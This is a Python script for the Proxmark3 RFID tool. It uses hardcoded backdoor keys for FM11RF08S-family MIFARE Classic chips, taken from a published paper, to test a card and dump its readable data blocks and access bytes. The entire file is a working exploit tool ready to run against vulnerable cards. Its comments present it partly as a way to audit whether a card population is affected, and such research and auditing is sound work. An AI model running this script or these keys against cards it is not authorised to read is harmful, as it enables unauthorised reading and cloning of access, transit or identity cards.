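#!/usr/bin/env python3

# Uses the backdoor keys for the FM11RF08S (and similar) chipsets to quickly dump all the data they can read
# Should work on vulnerable 1k and 4k chips
# Based on the work in this paper: https://eprint.iacr.org/2024/1275
#
# The script reports three distinct outcomes:
#   * a key was accepted   -> the readable data is displayed;
#   * every key was refused -> "None of the backdoor keys seem to work";
#   * the probe itself failed (no card, unrecognised client output) -> the
#     raw client output is printed and no conclusion is drawn about the tag.
# Keeping the last two apart matters when the script is used to check whether
# a card population is affected: a read error is not evidence that a tag
# rejects the keys.

import pm3
import sys

# (key, size flag) pairs, tried in order. The size string is interpolated
# into the client commands as "--1k" / "--4k".
BACKDOOR_KEYS = [("A396EFA4E24F", "1k"), ("A31667A8CEC1", "1k"), ("518B3354E760", "4k")]
WORKING_KEY = None
# Size flag that belongs to WORKING_KEY. Stored explicitly so the final view
# command does not depend on whatever value the loop variable was left with.
working_size = None
# Set when the probe stopped on an error rather than on a key refusal.
probe_failed = False

required_version = (3, 8)
if sys.version_info < required_version:
    print(f"Python version: {sys.version}")
    print(f"The script needs at least Python v{required_version[0]}.{required_version[1]}. Abort.")
    # sys.exit() does not rely on the interactive `exit` helper installed by
    # the site module, and the non-zero status tells callers the run aborted.
    sys.exit(1)

p = pm3.pm3()

# Test all the keys first to see which one works (if any)
for bk, sz in BACKDOOR_KEYS:
    p.console(f"hf mf ecfill --{sz} -c 4 -k {bk}")
    # Status markers are matched against whole output lines, not substrings.
    output = p.grabbed_output.split('\n')

    if "[#] Card not found" in output:
        print("Error reading the tag:")
        print("\n".join(output))
        probe_failed = True
        break
    elif "[-] Fill ( fail )" in output:
        # This key was refused; try the next candidate.
        continue
    elif "[+] Fill ( ok )" not in output:
        # Neither a success nor a known failure marker: stop instead of guessing.
        print("Unexpected output, exiting:")
        print("\n".join(output))
        probe_failed = True
        break
    else:
        WORKING_KEY = bk
        working_size = sz
        break

if WORKING_KEY is not None:
    print(f"Backdoor key {WORKING_KEY} seems to work, dumping data...")
    print("IMPORTANT: Only data blocks and access bytes can be dumped; keys will be shown as all 0's")
    # NOTE(review): the second positional argument is passed through unchanged
    # from the original script; confirm its meaning against the pm3 bindings.
    p.console(f"hf mf eview --{working_size}", True)
elif not probe_failed:
    # Only claim the keys do not work when every one of them was actually
    # tried and refused; an aborted probe has already printed its own error.
    print("None of the backdoor keys seem to work with this tag.")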